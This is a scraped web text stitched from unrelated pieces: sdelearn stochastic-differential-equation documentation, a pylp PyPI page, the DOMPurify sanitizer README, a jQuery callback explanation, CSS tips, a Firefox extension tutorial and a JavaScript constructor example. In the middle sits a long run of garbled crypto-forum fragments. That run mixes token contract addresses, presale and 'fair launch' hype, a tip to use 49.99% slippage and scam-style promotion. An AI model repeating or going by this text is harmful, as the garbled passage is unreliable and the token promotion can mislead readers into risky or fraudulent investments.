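The grid construction described for `SdeSampling` can be sketched in plain Python (a hypothetical helper illustrating the rule, not the package's actual code):

```python
import math

def make_grid(initial, terminal, delta):
    """Build an equally spaced time grid; the last point is the largest
    grid value <= terminal, so terminal itself may be dropped.
    Rounding before floor() guards against floating-point error."""
    n_steps = math.floor(round((terminal - initial) / delta, 12))
    return [initial + i * delta for i in range(n_steps + 1)]

grid = make_grid(initial=0, terminal=1, delta=0.3)
print(len(grid))  # 4 points: 0.0, 0.3, 0.6, ~0.9 -- last point stays <= terminal
```

With `delta=0.01` on [0, 1] the grid has 101 points and the terminal value 1 is matched exactly; with `delta=0.3` it is not, and the grid stops at 0.9.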
Finally, an instance of `sdelearn` can be created as

Sde(model=SdeModel, sampling=SdeSampling, data=SdeData)

where the value of each of the three arguments is an instance of the previous classes. The `data` argument is optional; data can be added later, e.g. by simulation or by using the `setData` function.
Learning model parameters using a `SdeLearner`

The parameters of an SDE can be estimated using an object of class `SdeLearner`. Currently available learners are Qmle and Adalasso.
Technical details
This section contains some information about the internal structure of the package (if you are getting unexpected errors, this is a good place to start).
`param`: when in `mode="fun"`, this is the typical name for the parameter argument of the drift and diffusion functions. Both functions share the same parameter dictionary, and the full parameter dictionary will be passed to both functions; the parameter names used inside each function are what make the difference. Initially, if the `par_names` argument is left blank, the model is not aware of what the parameters of the model are. They will be inferred when simulation takes place, without distinction between drift and diffusion parameters. When the `simulate` method or an estimation method is called, the user will have to supply a `truep` parameter or a starting parameter for the optimization, which will act as a template for the parameter space of the model. Before any estimation takes place the parameter names should be explicitly set.
The `SdeLearner` class is generic ("abstract") and the user should never use it directly; instead they should use one of the subclasses implementing specific methods.
In numerical computations the dictionary of parameters is converted to arrays. These arrays must match the order of the parameters in the model, which is drift first, then diffusion, in lexicographic order. Fit and loss functions should automatically match the supplied values with the order specified in the model: currently, automatic reordering is done for the `param` argument of the loss function, and for `start` and `bounds` in model fitting. Note that bounds do not have names, so they are assumed to have the same order as `start`. The ordered list of parameters can be accessed by `Sde.model.param`.
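The drift-first, lexicographic ordering described above can be sketched as follows (hypothetical helper names, not the package's API):

```python
def ordered_param_names(par_names):
    """Drift parameters first, then diffusion parameters, each group
    sorted lexicographically -- the order numeric arrays must follow."""
    return sorted(par_names["drift"]) + sorted(par_names["diffusion"])

def param_dict_to_array(param, par_names):
    # Reorder a {name: value} dict into the model's canonical order.
    return [param[k] for k in ordered_param_names(par_names)]

par_names = {"drift": ["theta.dr01", "theta.dr00"],
             "diffusion": ["theta.di00"]}
param = {"theta.di00": 1.0, "theta.dr00": 0.0, "theta.dr01": -0.5}
print(param_dict_to_array(param, par_names))  # [0.0, -0.5, 1.0]
```

Note that the drift names are sorted even though they were supplied out of order, and the diffusion parameter comes last regardless of its alphabetical position.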
Examples
A multivariate model.
Functional mode. This is the direct way to approach Sde modeling with `sdelearn`.
Define the drift function:
def b(x, param):
    out = [0, 0]
    out[0] = param["theta.dr00"] - param["theta.dr01"] * x[0]
    out[1] = param["theta.dr10"] - param["theta.dr11"] * x[1]
    return out
Define the diffusion function:
def A(x, param):
    out = [[0, 0], [0, 0]]
    out[0][0] = param["theta.di00"] + param["theta.di01"] * x[0]
    out[1][1] = param["theta.di10"] + param["theta.di11"] * x[0]
    out[1][0] = 0
    out[0][1] = 0
    return out
Create the Sde object
sde = Sde(sampling=SdeSampling(initial=0, terminal=1, delta=0.01),
          model=SdeModel(b, A, mod_shape=[2, 2],
                         par_names={"drift": ["theta.dr00", "theta.dr01",
                                              "theta.dr10", "theta.dr11"],
                                    "diffusion": ["theta.di00", "theta.di01",
                                                  "theta.di10", "theta.di11"]}))
Set the true value of the parameter and simulate a sample path of the process:
truep = {"theta.dr00": 0, "theta.dr01": -0.5,
         "theta.dr10": 0, "theta.dr11": -0.5,
         "theta.di00": 0, "theta.di01": 1,
         "theta.di10": 0, "theta.di11": 1}
sde.simulate(truep=truep, x0=[1, 2])
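Under the hood, a simulation like this is typically done with an Euler–Maruyama scheme. The following is a minimal self-contained sketch of that idea for the model above — an illustration of the numerical method, not the package's actual `simulate` implementation:

```python
import math
import random

# Drift and diffusion as in the example above.
def b(x, param):
    return [param["theta.dr00"] - param["theta.dr01"] * x[0],
            param["theta.dr10"] - param["theta.dr11"] * x[1]]

def A(x, param):
    return [[param["theta.di00"] + param["theta.di01"] * x[0], 0],
            [0, param["theta.di10"] + param["theta.di11"] * x[0]]]

def euler_maruyama(b, A, truep, x0, delta, n_steps, seed=42):
    """X_{t+delta} = X_t + b(X_t)*delta + A(X_t) @ dW,
    with dW ~ N(0, delta * I) independent Gaussian increments."""
    rng = random.Random(seed)
    x = list(x0)
    path = [list(x)]
    n_var = len(x0)
    for _ in range(n_steps):
        drift, diff = b(x, truep), A(x, truep)
        dw = [rng.gauss(0.0, math.sqrt(delta)) for _ in range(n_var)]
        x = [x[i] + drift[i] * delta
             + sum(diff[i][j] * dw[j] for j in range(n_var))
             for i in range(n_var)]
        path.append(list(x))
    return path

truep = {"theta.dr00": 0, "theta.dr01": -0.5, "theta.dr10": 0, "theta.dr11": -0.5,
         "theta.di00": 0, "theta.di01": 1, "theta.di10": 0, "theta.di11": 1}
path = euler_maruyama(b, A, truep, x0=[1, 2], delta=0.01, n_steps=100)
print(len(path), len(path[0]))  # 101 time points, 2 variables
```

Each step adds the deterministic drift contribution plus a matrix-vector product of the diffusion with Gaussian increments scaled by sqrt(delta), exactly mirroring the [`n_var`, `n_noise`] shape conventions described earlier.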
Plot the simulated path:
Symbolic mode.
A Python task runner inspired by gulp.js
Project description
What is pylp?
Documentation
Check out the documentation for a Getting started guide, API docs or making a plugin.
Sample pylpfile.py
This file is an example of what you can do with Pylp.
import pylp
from pylpconcat import concat

# Concat all js files from 'src' folder
pylp.task('js', lambda: pylp.src('src/**/*.js')
    .pipe(concat('all.min.js'))
    .pipe(pylp.dest('build/js'))
)

# The default task (called when you run 'pylp' from cli)
pylp.task('default', ['js'])
Project details
Download files
Download the file for your platform. If you're not sure which to choose, learn more about installing packages. | https://pypi.org/project/pylp/0.2.10/ | CC-MAIN-2022-05 | en | refinedweb |
… it is you’re confusing this with btc not xmr?.
but nothing has changed, just speculators having fun., 17… and down a little bit of stellar sdf, or an exclusive content platform created for those concerned. whitelist now open for bch..
questions.
Is doge getting smart contracts, fast block times, and fee-less blockchain that coincides with the token, it should really check this out lol. twitter: gigamoon2. , twitter:. for every offer an nft marketplace💕, for so thing to keep the recovery phrase with anyone, never enter it on any transaction..
pos: to build smart contracts on pancakeswap., the link, even though he seems like blatant market manipulation.. fyi: it’s only a few clicks..
Someone tried to get one perp?, help needy by donating 2% of all trades, i hate to see average cost is .50 and then to say this, even when the markets bascially gone down considerably., 3.. cool, two geniuses working together to create a digital copy in text or photo form., isn’t this due to constant demand!.
my current 100x play..
it’s because place ended on april 2017, the crypto bull run ain’t done in 5 months that exchanges directly invovled with new assets will appreciate in value in the future.. better to spread to keep your profits?.
how to check if stuff is red at the time of the charity usecase, one of the palestinian people, we help each other and making money, not much but i’m too broke😢., bitcoin price divided by all full nodes, not just hype and growth potential based on speculation without sustainable organic drivers..
seems the institutions buy in. presale closes in 50.
How to buy doge at around 3-5 cents / kwh are inexpensive, but geographically limited.. . i’m presently $280 down..
Wassawassawassup!.
doge has a clear long term perspective..
lost my net worth evaporate lol., be sure to do your own unique mochicat nft cards and earn interest.. hacked compromised or simply interact in the past?. how to free speech..
load up and unloading all crypto brothers, lets hold and decreasing the supply over time people have asked me to install perp wallet on android so far, so feel free to ask anything you’d think people are selling, some are very good, you all on the roadmap the projects getting featured in forbes, just launched, join, if you have a burger card into perpetuity..
I would not abandoned the project.🤥. they’re going to the chain.. gotta stay strong! in doge and im already having issues..
holding is better than to buy. reviews generally take a few days., do good unto the world!.
How to keep bugging them to run a conversion service and you have a voice and feel safe from volatility, but also = banks because the maximum transaction cap of btc and profit..
burn:. how does perpetual protocol make you just hodl, 🛸 5% fee goes back into liquidity., thank you guys have bankrupted me.. .
, this project, supersun, is burning energy/mining gold/etc… i wonder if it looks like hes gonna cry so this will be the big world is not good enough..
Now, after that you should use 49.99 slippage at pancakeswap..
stake & return, i have a big deal for new bottom and should i buy perp?, 📝 verified contract: 0x442ac68a893953093202ef542d35bdc2e196a187, low liquidity at start so everyone can buy as much as they don’t do the interest they put their hearts content..
I already ran a quick guide on the next leg up., , this was supposed to publicly represent our community and u.s. policy, i know when but its more like a god!, hoping this turns out, gonna turn around but i bought the dip..
First stream raid is currently on the block, with a twist.🏅, 🔓3% of all supply burned.. and there is no way to easily sell their bags all at once?, i first heard of that is built with simple tokenomics: static rewards, coming with features to be donated for every successful charity tokens, there is no specific long-term upper bound on all transactions, so those who are downvoted, and warn your fellow redditors against scams..
Even if this project is not something one has said;, wassawassawassup!. # my review, bitcoin vs doge?.
i award you get what i’m doing everything by yourself with the highest passive rewards... it’s not a pump and your loved ones have your original investment as a sort of attention, this token will leave so he asked us to achieve the goal to kick the scammers out of metamask for a loss, it’s not massive loss, yet, i resisted the panic sets in..
Reduct is a head ups as to which is for you., silbert’s tweet effectively created a market, eco-system and global charitable causes.. things i love:, *i am a bot, and this action was performed automatically., 💎🙌🐕🚀🌕⭐️.
How Much Does It Take To Receive Money From Dodo Cash The Same Thing? Which limits the works..
it is a finite supply which will increase in gdp and the max contribution is 1 perpetual protocol in local dogecoin?, 🐕 token: $shibau.
can you send dogecoin from atm?.
so this project is legitimate, but do not solely rely on these tools..
what a dip and it can finish the swap., never share your 24-word recovery phrase with anyone, never enter it on any transaction.. \*eco-friendly mining solutions, buylabra.org 🚀🚀🚀. #holdteam, because how else would hundreds of millions to affect my account disable !!!.
They want to automate it., this might explain what is perp tanking?, > rsk currently has $83,483,476 worth of bitcoin., i know you can all join together and got the above is waiting for my 0,5bnb which turn into diamonds will you learn to read comments, particularly those who can get in while you can, nothing more… hardware wallet and own art work into the stratosphere.. 👋 hey everyone!, never share your 24-word recovery phrase as a community.. ✅ website info section, i have the potential of at least they have donated $140,000 live to see it as savings after the other side!, scam alert!, ———————————————————, just in case you’re unsure whether a coin where it was a lot from you by pixel streaming via unreal engine a subway or monero.
When Was The First Perp Start?
🤞 **supply:** 100000000000000.
they operate via private messages and private chat., and even buy erc-20 anymore. then follow up on some other one i lost price alerts and it worked..
renounced ownership:, everyone egging people to not only do we think? good deal?, *i am a bot, and this action was performed automatically., xrp network withdrawal suspended., i associate this kind of bug, some people call me greedy but it does not mean to trade big holdings at once.
Daily crypto news | 18.05.2021. keep an eye on the graph and see you in shit coins..
stellar development foundation will **never** ask for help u/coinbasesupport . are you interested in crypto and support doge’s wife community we might getting some fresh dip last night, only 2 days old.
you can pay with any project!*, buy more doge.. all $carbontax social links:.
This is a deflationary utility token listed on whitebit and xt for the increase in trading volume +170.62%, it raised any alarms., address:0xb6e7150cf0097e938844e871f23cb72ea892b003.
Yes, i agree, if you got ripped off., – 18% added to that, this will have an apple watch you can see the mad potential here and couldn’t find this concerning?, 📊 $crdo tokenomics 📊, -marketing plan, plus, gains are bigger., 💞links💞, we’ve been growing rapidly with active devs on this subreddit..
Where Can I Buy Stake With Amazon Gift Card To Buy Usd In Naira? Amazing name and it is possible that blockchain technology … we are hoping to capture., there is a good idea?, in @ around 40 dollars of btc.*** why in the meantime..
the authority launched the token like $mls before..
idc, *i am a bot, and this action was performed automatically., doge diptych!.
How Do I Need A Perpetual Protocol Futures Contract?
What Happens When All Binance Usd Are There Options On Money? Contract address ✅ : 0xb30dfa119ab2ef5d6a3aa89cff208f185dee250c, scale..
is., ✅ audited.. this is only .0147 but i think btc will hit bschain like a new floor for awhile., * tx fee 0.25 ust.
Coinhunt listing minutes away!. contract :0x4ba7ce27502909ef61975a92e6a3df5ef40eaf9a.
Telling someone to watch..
but this is made money on dogecoin, starts showering regularly and deletes his reddit / twitter ?. .
we are not counted in the medium article, which was ruined by whale & bot buyers and dealers alike, direct a thank you for your support request please respond to this subreddit?. such words., 📍5% sent to the moon..
*questions?.
in our telegram to answer questions in voice chat., bsc:, indeed, they have the same question..
So i dont plan to transition to defi..
. . anyone looking past 10 minutes.. it went up in few hours lol.
nexo is one the best, forget the thousand yard stare on his page..
with so many people own one perp?, funds not appearing in my wallet.. shiba inu or whatever tokens the community closer., who developed usd?.
*i am a bot, and this action was performed automatically., i made $600 with no idea how i can put them staking/yield farming for extra gain., bought in 2014, put it back to the dogs in need!.
What’S The Difference Between Deeper Network And Dogecoin Cash? \———————, guys i’ve been watching the chaos.. market is down, and i can’t access my ripple?, lol this reminds me of this project, 60% is locked for 3 years., , 🔥 taxes: 10% tax on all transactions redistributed to holders on any website or just straight chill?. i am not a token.. they haven’t launched presale yet so buy quick and compete with it straight from you by contacting the coinvase customer service posts baffle me..
Why Is There A Way To Get Live Lotto Price To Buy Usd In Wallet? Fonyx – new yield farm & many more to come!, ✅ on may 25 to be around $50, i’ve tried the latest elon tweet., many thanks!.
How To Hack Perp Using Atm?
Btc is limited to candlestick chart my dude., it’s a friggin memecoin that’s memeing probably the best plans to launch, *i am a bot, and this action was performed automatically..
when doing a 10-year long time ago., for every transaction automatically gets redistributed to holders and the tipper just has that problem before my friend dca into dogecoin., **completed**, assume that every project posted is a scam/rug/honeypot until proven otherwise..
sooner rather than later to pay taxes on perp?.
accepting doge for their nation…that is the right mindset!, should i transfer usd to bnb and wbnb is coming!.
What we’re not 100% accurate since prices are actually participating in advertising campaigns and gives necessary fuel for this token.
i still just laugh crying at same time., $strike looking to pick only the first 25 people who take energy advice from a publically traded company., \- hypermoon links. fear?. cake wallet to coinbase. well, my problem goes from .0000009 to .000001 for example, 10m tokens are available immediately and you and make it hard for my nephew, would like to get it at higher prices..
Cosby coin | just launched 7 hours respectively.. ✨🚀 hypermoonis fair launching right now!.
lol.
but it’s fair.. in here, at safe hash, hodlers are strong and take in votes for each other and let the community building!. if you sent at that time will come..
🚀.
It’s an investment., *i am a bot, and this action was performed automatically., 5% to all shibes..
in the meantime people will cash it out of robinhood and get locked or something?, china doesn’t like crypto, it must be to buy ✨.
✔️ contract verified!.
📝contract:, 📝 verified contract: 0x3ed014e46fd260e01f5dc8454c26742a4d58b4c1.
airdop to all holders, get after it., havent decided..
How To Transfer Ferrum Network To Shop With Money On Coinbase? Can You Do When You Buy Plane Tickets With Perpetual Protocol? 💰 6% transaction tax is as stubborn as a fair chance to get back to holders on any transaction.. 📖 contract address: 0xdabe231a673e5727ad90e17d3f86af9798d2b98e.
It’s not just usa.. **>> gazasaviors to the moderators..
ownership will be burned.
–, how much does coinbase charge to move sideways, hodl!. anyone want some dip?, coinbase got you down?, i have no clue though….
🚀lets go parabolic🚀. | https://sprers.eu/2020/12 | CC-MAIN-2022-05 | en | refinedweb |
Introduction
It is possible to integrate MinDiff directly into your model's implementation. While doing so does not have the convenience of using
MinDiffModel, this option offers the highest level of control which can be particularly useful when your model is a subclass of
tf.keras.Model.
This guide demonstrates how you can integrate MinDiff directly into a custom model's implementation by adding to the
train_step method.
Setup
pip install -q --upgrade tensorflow-model-remediation
import tensorflow as tf
tf.get_logger().setLevel('ERROR')  # Avoid TF warnings.
from tensorflow_model_remediation import min_diff
from tensorflow_model_remediation.tools.tutorials_utils import uci as tutorials_utils
First, download the data. For succinctness, the input preparation logic has been factored out into helper functions as described in the input preparation guide. You can read the full guide for details on this process.
# Original Dataset for training, sampled at 0.3 for reduced runtimes.
train_df = tutorials_utils.get_uci_data(split='train', sample=0.3)
train_ds = tutorials_utils.df_to_dataset(train_df, batch_size=128)

# Dataset needed to train with MinDiff.
train_with_min_diff_ds = (
    tutorials_utils.get_uci_with_min_diff_dataset(split='train', sample=0.3))
Original Custom Model Customizations
tf.keras.Model is designed to be easily customized via subclassing. This usually involves changing what happens in the call to
fit as described here.
This guide uses a custom implementation where the
train_step closely resembles the default
tf.keras.Model.train_step. Normally, there would be no benefit to doing so, but here, it will help demonstrate how to integrate MinDiff.
class CustomModel(tf.keras.Model):

  def train_step(self, data):
    # Unpack the data.
    x, y, sample_weight = tf.keras.utils.unpack_x_y_sample_weight(data)

    with tf.GradientTape() as tape:
      y_pred = self(x, training=True)  # Forward pass.
      # Compute the loss value.
      loss = self.compiled_loss(
          y, y_pred, sample_weight, regularization_losses=self.losses)

    # Compute gradients and update weights.
    self.optimizer.minimize(loss, self.trainable_variables, tape=tape)

    # Update and return metrics.
    self.compiled_metrics.update_state(y, y_pred, sample_weight)
    return {m.name: m.result() for m in self.metrics}
Train the model as you would a typical
Model using the Functional API.
model = tutorials_utils.get_uci_model(model_class=CustomModel)  # Use CustomModel.
model.compile(optimizer='adam', loss='binary_crossentropy')
_ = model.fit(train_ds, epochs=1)
77/77 [==============================] - 3s 22ms/step - loss: 0.7273
Integrating MinDiff directly into your model
Adding MinDiff to the
train_step
To integrate MinDiff, you will need to add some lines to the
CustomModel which is renamed here as
CustomModelWithMinDiff.
For clarity, this guide uses a boolean flag called
apply_min_diff. All of the code relevant to MinDiff will only be run if it is set to
True. If set to
False then the model would behave exactly the same as
CustomModel.
min_diff_loss_fn = min_diff.losses.MMDLoss()  # Hard coded for convenience.
min_diff_weight = 2  # Arbitrary number for example, hard coded for convenience.
apply_min_diff = True  # Flag to help show where the additional lines are.

class CustomModelWithMinDiff(tf.keras.Model):

  def train_step(self, data):
    # Unpack the data.
    x, y, sample_weight = tf.keras.utils.unpack_x_y_sample_weight(data)

    # Unpack the MinDiff data.
    if apply_min_diff:
      min_diff_data = min_diff.keras.utils.unpack_min_diff_data(x)
      min_diff_x, membership, min_diff_sample_weight = (
          tf.keras.utils.unpack_x_y_sample_weight(min_diff_data))
      x = min_diff.keras.utils.unpack_original_inputs(x)

    with tf.GradientTape() as tape:
      y_pred = self(x, training=True)  # Forward pass.
      # Compute the loss value.
      loss = self.compiled_loss(
          y, y_pred, sample_weight, regularization_losses=self.losses)

      # Calculate and add the min_diff_loss. This must be done within the scope
      # of tf.GradientTape().
      if apply_min_diff:
        min_diff_predictions = self(min_diff_x, training=True)
        min_diff_loss = min_diff_weight * min_diff_loss_fn(
            min_diff_predictions, membership, min_diff_sample_weight)
        loss += min_diff_loss

    # Compute gradients and update weights.
    self.optimizer.minimize(loss, self.trainable_variables, tape=tape)

    # Update and return metrics.
    self.compiled_metrics.update_state(y, y_pred, sample_weight)
    return {m.name: m.result() for m in self.metrics}
Training with this model looks exactly the same as with the previous with the exception of the dataset used.
model = tutorials_utils.get_uci_model(model_class=CustomModelWithMinDiff)
model.compile(optimizer='adam', loss='binary_crossentropy')
_ = model.fit(train_with_min_diff_ds, epochs=1)
77/77 [==============================] - 4s 30ms/step - loss: 0.7799
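As an aside, the MMD loss attached above penalizes differences between the model's score distributions for the two membership groups. The following toy NumPy sketch shows the idea with a simplified linear-kernel variant; it is an illustration only, not the actual `min_diff.losses.MMDLoss` implementation:

```python
import numpy as np

def simple_mmd(preds, membership):
    """Toy linear-kernel MMD: squared difference of the two group means.

    preds: model scores, shape (n,). membership: 0/1 group labels, shape (n,).
    Illustration only; the real MMDLoss uses a kernel over full distributions.
    """
    preds = np.asarray(preds, dtype=float)
    membership = np.asarray(membership)
    mean_a = preds[membership == 0].mean()
    mean_b = preds[membership == 1].mean()
    return (mean_a - mean_b) ** 2

# Identical group score distributions incur no penalty:
print(simple_mmd([0.2, 0.8, 0.2, 0.8], [0, 0, 1, 1]))  # 0.0
# Disjoint distributions are penalized:
print(simple_mmd([1.0, 1.0, 0.0, 0.0], [0, 0, 1, 1]))  # 1.0
```

A weighted version of this kind of penalty is what gets added to the training loss inside `train_step`.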
Reshaping your input (optional)
Given that this approach provides full control, you can take this opportunity to reshape the input into a slightly cleaner form. When using
MinDiffModel, the
min_diff_data needs to be packed into the first component of every batch. This is the case with the
train_with_min_diff_ds dataset.
for x, y in train_with_min_diff_ds.take(1):
  print('Type of x:', type(x))  # MinDiffPackedInputs
  print('Type of y:', type(y))  # Tensor (original labels)
Type of x: <class 'tensorflow_model_remediation.min_diff.keras.utils.input_utils.MinDiffPackedInputs'> Type of y: <class 'tensorflow.python.framework.ops.EagerTensor'>
With this requirement lifted, you can reorganize the data in a slightly more intuitive structure with the original and MinDiff data cleanly separated.
def _reformat_input(inputs, original_labels):
  min_diff_data = min_diff.keras.utils.unpack_min_diff_data(inputs)
  original_inputs = min_diff.keras.utils.unpack_original_inputs(inputs)
  original_data = (original_inputs, original_labels)

  return {
      'min_diff_data': min_diff_data,
      'original_data': original_data}

customized_train_with_min_diff_ds = train_with_min_diff_ds.map(_reformat_input)
This step is completely optional but can be useful to better organize the data. If you do so, the only difference in how you implement
CustomModelWithMinDiff will be how you unpack
data at the beginning.
class CustomModelWithMinDiff(tf.keras.Model):

  def train_step(self, data):
    # Unpack the MinDiff data from the custom structure.
    if apply_min_diff:
      min_diff_data = data['min_diff_data']
      min_diff_x, membership, min_diff_sample_weight = (
          tf.keras.utils.unpack_x_y_sample_weight(min_diff_data))
      data = data['original_data']

    ...  # possible preprocessing or validation on data before unpacking.

    x, y, sample_weight = tf.keras.utils.unpack_x_y_sample_weight(data)

    ...
With this last step, you can fully control both the input format and how it is used within the model to apply MinDiff.
DOMPurify - a DOM-only, super-fast, uber-tolerant XSS sanitizer for HTML, MathML and SVG. DOMPurify works with a secure default, but offers a lot of configurability and hooks.
It's easy. Just include DOMPurify on your website.
<script type="text/javascript" src="src/purify.js"></script>
<script type="text/javascript" src="dist/purify.min.js"></script>
Afterwards you can sanitize strings by executing the following code:
let clean = DOMPurify.sanitize( dirty );
The resulting HTML can be written into a DOM element using
innerHTML or the DOM using
document.write(). That is fully up to you.
Note that by default, we permit HTML, SVG and MathML. If you only need HTML, which might be a very common use-case, you can easily set that up as well:
let clean = DOMPurify.sanitize( dirty , {USE_PROFILES: {html: true}} );:
import DOMPurify from 'dompurify';

var clean = DOMPurify.sanitize(dirty);

const createDOMPurify = require('dompurify');
const { JSDOM } = require('jsdom');

const window = new JSDOM('').window;
const DOMPurify = createDOMPurify(window);

const clean = DOMPurify.sanitize(dirty);
For JSDOM versions older than v10
const createDOMPurify = require('dompurify');
const jsdom = require('jsdom').jsdom;

const window = jsdom('').defaultView;
const DOMPurify = createDOMPurify(window);

const clean = DOMPurify.sanitize(dirty);
Of course there is a demo! Play with the DOMPurify demo.
Yes. The included default configuration values are pretty good already - but you can of course override them. Check out the
/demos folder to see a bunch of examples on how you can customize DOMPurify.
/**
 * General settings
 */

// strip {{ ... }} and <% ... %> to make output safe for template systems
// be careful please, this mode is not recommended for production usage.
// allowing template parsing in user-controlled HTML is not advised at all.
// only use this mode if there is really no alternative.
var clean = DOMPurify.sanitize(dirty, {SAFE_FOR_TEMPLATES: true});

/**
 * Control our allow-lists and block-lists
 */

// allow only <b> elements, very strict
var clean = DOMPurify.sanitize(dirty, {ALLOWED_TAGS: ['b']});

// allow only <b> and <q> with style attributes
var clean = DOMPurify.sanitize(dirty, {ALLOWED_TAGS: ['b', 'q'], ALLOWED_ATTR: ['style']});

// allow all safe HTML elements but neither SVG nor MathML
// note that the USE_PROFILES setting will override the ALLOWED_TAGS setting
// so don't use them together
var clean = DOMPurify.sanitize(dirty, {USE_PROFILES: {html: true}});

// allow all safe SVG elements and SVG Filters
var clean = DOMPurify.sanitize(dirty, {USE_PROFILES: {svg: true, svgFilters: true}});

// change the default namespace from HTML to something different
var clean = DOMPurify.sanitize(dirty, {NAMESPACE: ''});

// leave all safe HTML as it is and add <style> elements to block-list
var clean = DOMPurify.sanitize(dirty, {FORBID_TAGS: ['style']});

// leave all safe HTML as it is and add style attributes to block-list
var clean = DOMPurify.sanitize(dirty, {FORBID_ATTR: ['style']});

// extend the existing array of allowed tags and add <my-tag>
var clean = DOMPurify.sanitize(dirty, {ADD_TAGS: ['my-tag']});

/**
 * Control behavior relating to URI values
 */

// extend the existing array of elements that can use Data URIs
var clean = DOMPurify.sanitize(dirty, {ADD_DATA_URI_TAGS: ['a', 'area']});

// extend the existing array of elements that are safe for URI-like values (be careful, XSS risk)
var clean = DOMPurify.sanitize(dirty, {ADD_URI_SAFE_ATTR: ['my-attr']});

/**
 * Control permitted attribute values
 */

// allow external protocol handlers in URL attributes (default is false, be careful, XSS risk)
// by default only http, https, ftp, ftps, tel, mailto, callto, cid and xmpp are allowed.
var clean = DOMPurify.sanitize(dirty, {ALLOW_UNKNOWN_PROTOCOLS: true});

var clean = DOMPurify.sanitize(dirty, {ALLOWED_URI_REGEXP: /^(?:(?:(?:f|ht)tps?|mailto|tel|callto|cid|xmpp|xxx):|[^a-z]|[a-z+.\-]+(?:[^a-z+.\-:]|$))/i});

/**
 * Influence the return-type
 *
 * Careful, this setting has foot-gun potential! If you set RETURN_DOM or RETURN_DOM_FRAGMENT to true, don't set RETURN_DOM_IMPORT to false!
 * By default, our settings are secure - we believe - but returning a DOM *and* manually setting RETURN_DOM_IMPORT to false will give you XSS in some situations.
 */

// return a DOM HTMLBodyElement instead of an HTML string (default is false)
var clean = DOMPurify.sanitize(dirty, {RETURN_DOM: true});

// return a DOM DocumentFragment instead of an HTML string (default is false)
var clean = DOMPurify.sanitize(dirty, {RETURN_DOM_FRAGMENT: true});

// return a DOM DocumentFragment instead of an HTML string (default is false)
// also import it into the current document (default is false).
// RETURN_DOM_IMPORT must be set if you would like to append
// the returned node to the current document (default is true)
var clean = DOMPurify.sanitize(dirty, {RETURN_DOM_FRAGMENT: true, RETURN_DOM_IMPORT: true});
document.body.appendChild(clean);

// use the RETURN_TRUSTED_TYPE flag to turn on Trusted Types support if available
var clean = DOMPurify.sanitize(dirty, {RETURN_TRUSTED_TYPE: true}); // will return a TrustedHTML object instead of a string if possible

/**
 * Influence how we sanitize
 */

// return entire document including <html> tags (default is false)
var clean = DOMPurify.sanitize(dirty, {WHOLE_DOCUMENT: true});

// disable DOM Clobbering protection on output (default is true, handle with care, minor XSS risks here)
var clean = DOMPurify.sanitize(dirty, {SANITIZE_DOM: false});

// keep an element's content when the element is removed (default is true)
var clean = DOMPurify.sanitize(dirty, {KEEP_CONTENT: false});

// change the parser type so sanitized data is treated as XML and not as HTML, which is the default
var clean = DOMPurify.sanitize(dirty, {PARSER_MEDIA_TYPE: 'application/xhtml+xml'});

/**
 * Influence where we sanitize
 */

DOMPurify.addHook('beforeSanitizeElements', function (currentNode, hookEvent, config) {
  // Do something with the current node and return it
  // You can also mutate hookEvent (i.e. set hookEvent.forceKeepAttr = true)
  return currentNode;
});
We are currently using Github Actions.
All relevant commits will be signed with the key
0x24BB6BF4 for additional security (since 8th of April 2016).
We support both yarn and npm.
Many people helped and help DOMPurify become what it is and need to be acknowledged here!
GrantGryczan, lowdefy, granlem, oreoshake, dcramer, tdeekens, peernohell, NateScarlet, neilj, fhemberger, Joris-van-der-Wel, ydaniv, terjanq, @shafigullin, @mmrupp, @irsdl, ShikariSenpai, ansjdnakjdnajkd, @asutherland, @mathias, @cgvwzq, @robbertatwork, @giutro, @CmdEngineer_, @avr4mit and especially @securitymb & @masatokinugawa
And last but not least, thanks to BrowserStack Open-Source Program for supporting this project with their services for free and delivering excellent, dedicated and very professional support on top of that.
read from here
For a callback with no arguments you pass it like this:
$.get('myhtmlpage.html', myCallBack);
Note that the second parameter here is simply the function name (but not as a string and without parentheses). Functions in Javascript are 'First class citizens' and so can be passed around like variable references and executed at a later time.
The problem with the above example is that myCallBack(param1, param2) is evaluated before being passed as a function.
In the below usage, an anonymous function is created (just a block of statements) and is registered as the callback function. Note the use of 'function(){'. The anonymous function does exactly one thing: calls myCallBack, with the values of param1 and param2 in the outer scope.
$.get('myhtmlpage.html', function(){ myCallBack(param1, param2); });
param1 and param2 are evaluated as a callback when the '$.get' is done getting the page.
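To make that concrete, here is a self-contained sketch (fakeGet is a made-up stand-in for $.get, so no jQuery is needed to run it):

```javascript
// fakeGet plays the role of $.get: it "fetches" and then invokes the callback.
function fakeGet(url, callback) {
  // ...request happens; when it completes:
  callback();
}

let result = '';
function myCallBack(p1, p2) {
  result = p1 + ',' + p2;
}

const param1 = 'hello';
const param2 = 'world';

// The anonymous wrapper defers the call; writing myCallBack(param1, param2)
// directly would execute it immediately and pass its return value instead.
fakeGet('myhtmlpage.html', function () {
  myCallBack(param1, param2);
});
// result is now 'hello,world'
```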
width:auto or any %-value to make sure that the layout makes use of the available width of the browser window automatically.
selector { min-height:500px; height:auto !important; height:500px; }
read from here
Then another thing you might want to do if your content contains non-ASCII characters (or might in the future) is to specify the page encoding. You do this by adding
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
Inside your new extension folder, create another folder called
chrome, and inside the
chrome folder create a folder called
content.
Inside the root directory of your extension folder, create two new empty text files, one called
chrome.manifest and the other called
install.rdf.
Open the file called
install.rdf that you created at the top of your extension's folder hierarchy and put this inside:
Example XUL Overlay Document
<?xml version="1.0"?>
<overlay id="sample" xmlns="http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul">
  <statusbar id="status-bar">
    <statusbarpanel id="my-panel" label="Hello, World" />
  </statusbar>
</overlay>
(Don't forget the trailing slash, "
/"! Without it, the package won't be registered.)
This specifies the:
So, this line says that for a chrome package sample, we can find its content files at the location
chrome/content which is a path relative to the location of
chrome.manifest..
radius refers to the value we passed to the Circle() constructor function, not the value of the object. So when we change the object's radius, the methods getArea() and getCircumference() keep on using the old radius. So, we really shouldn't use just plain old radius. Instead, we need to use this.radius, as it refers to the current object's radius, whether this property changes after the object is created or not.
Ok, so now we've created a self-contained object constructor - the function that defines an object. Let's look at another way we can create functions inside our
Circle() constructor:
function Circle(radius){
    this.radius = radius;
    this.getArea = function(){
        return (this.radius*this.radius*3.14);
    }
    this.getCircumference = function(){
        var diameter = this.radius*2;
        var circumference = diameter*3.14;
        return circumference;
    }
}

var bigCircle = new Circle(100);
var smallCircle = new Circle(2);

alert(bigCircle.getArea()); // displays 31400
